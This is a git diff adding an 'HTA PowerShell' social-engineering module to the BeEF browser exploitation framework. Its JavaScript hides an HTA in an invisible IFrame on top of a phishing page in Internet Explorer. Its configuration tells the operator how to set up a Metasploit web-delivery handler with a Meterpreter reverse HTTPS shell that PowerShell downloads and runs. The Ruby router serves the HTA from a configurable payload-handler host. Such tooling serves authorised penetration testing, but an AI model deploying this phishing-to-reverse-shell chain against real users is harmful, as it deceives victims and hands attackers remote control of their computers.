diff --git a/modules/social_engineering/hta_powershell/command.js b/modules/social_engineering/hta_powershell/command.js
new file mode 100755
index 000000000..b809124bd
--- /dev/null
+++ b/modules/social_engineering/hta_powershell/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var hta_url = '<%= @domain %>' + '<%= @mount_point %>';
+
+ if(beef.browser.isIE()){
+ // application='yes' is IE-only and needed to load the HTA into an IFrame.
+ // in this way you can have your phishing page, and load the HTA on top of it
+ beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'});
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');
+ }
+});
diff --git a/modules/social_engineering/hta_powershell/config.yaml b/modules/social_engineering/hta_powershell/config.yaml
new file mode 100755
index 000000000..bc1875c07
--- /dev/null
+++ b/modules/social_engineering/hta_powershell/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ hta_powershell:
+ enable: true
+ category: ["Social Engineering"]
+ name: "HTA PowerShell"
+ description: "Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame.
If the user allows execution, powershell is used to download the payload from a Metasploit handler and execute it.
Before launching the module, do the following on Metasploit:
use exploit/windows/misc/psh_web_delivery
set URIPATH /psh
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z"
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["IE"]
+ not_working: ["ALL"]
diff --git a/modules/social_engineering/hta_powershell/module.rb b/modules/social_engineering/hta_powershell/module.rb
new file mode 100755
index 000000000..237848fcf
--- /dev/null
+++ b/modules/social_engineering/hta_powershell/module.rb
@@ -0,0 +1,58 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Hta_powershell < BeEF::Core::Command
+
+ class Bind_hta < BeEF::Core::Router::Router
+ before do
+ headers 'Content-Type' => 'application/hta',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ get '/' do
+ response['Content-Type'] = "application/hta"
+ payload_handler = settings.payload_handler
+ print_info "Serving HTA. Payload handler: #{payload_handler}"
+ ""
+ end
+ end
+
+ def pre_send
+
+ # gets the value configured in the module configuration by the user
+ @datastore.each do |input|
+ if input['name'] == "payload_handler"
+ @payload_handler = input['value']
+ end
+ if input['name'] == "mount_point"
+ @mount_point = input['value']
+ end
+ end
+
+ # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
+ bind_hta = Hta_powershell::Bind_hta
+ bind_hta.set :payload_handler, @payload_handler
+ BeEF::Core::Server.instance.mount(@mount_point, bind_hta.new)
+ BeEF::Core::Server.instance.remap
+ end
+
+ def self.options
+ return [
+ {'name' => 'payload_handler', 'ui_label'=>'Payload Handler', 'value' =>'http://10.10.10.10:8080/psh'},
+ {'name' => 'mount_point', 'ui_label'=>'Mount point', 'value' =>'/hta'},
+ {'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beef_domain.com'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end